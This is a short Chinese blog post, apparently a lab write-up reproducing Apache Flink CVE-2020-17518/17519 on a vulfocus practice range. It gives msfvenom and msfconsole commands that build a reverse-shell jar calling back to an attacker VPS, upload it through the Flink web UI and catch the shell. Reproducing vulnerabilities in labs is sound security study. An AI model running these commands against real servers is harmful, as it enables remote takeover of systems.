Babing
Published on 2024-08-30 / 3 Visits
0
0

A25-1ApacheFlink-文件上传

A25-1ApacheFlink-文件上传

漏洞描述:

Flink 1.5.1引入了REST API,但其实现上存在多处缺陷,导致任意文件读取(CVE-2020-17519)和任意文件写入(CVE-2020-17518)漏洞。
CVE-2020-17518攻击者利用REST API,可以修改HTTP头,将上传的文件写入到本地文件系统上的任意位置(Flink 1.5.1进程能访问到的)。
CVE-2020-17519Apache Flink 1.11.0 允许攻击者通过JobManager进程的REST API读取JobManager本地文件系统上的任何文件(JobManager进程能访问到的)。

影响版本:

Apache:Apache Flink: 1.5.1 - 1.11.2  

网站图片:

image-20240620191902428

网络测绘:

使用vulfocus靶场进行复现

5、利用流程

1、生成恶意payload jar包(这里我们使用MSF渗透模块进行利用)

msfvenom -p java/shell_reverse_tcp lhost=vpsIP lport=空闲端口 -f jar >b.jar

2、访问靶场环境,将生成的payload文件下载到本地进行上传

3、MSF开启监听,等待shell反弹

msfconsole                       #启动msf



use exploit/multi/handler        #使用漏洞利用模块



开启监听



set payload java/shell_reverse_tcp     



set LHOST x.x.x.x               #vps地址



set LPORT 6666                  #空闲端口



exploit                         #或者run

4、点击submit ,getshell(靶场环境不稳定,试了好几遍)


Comment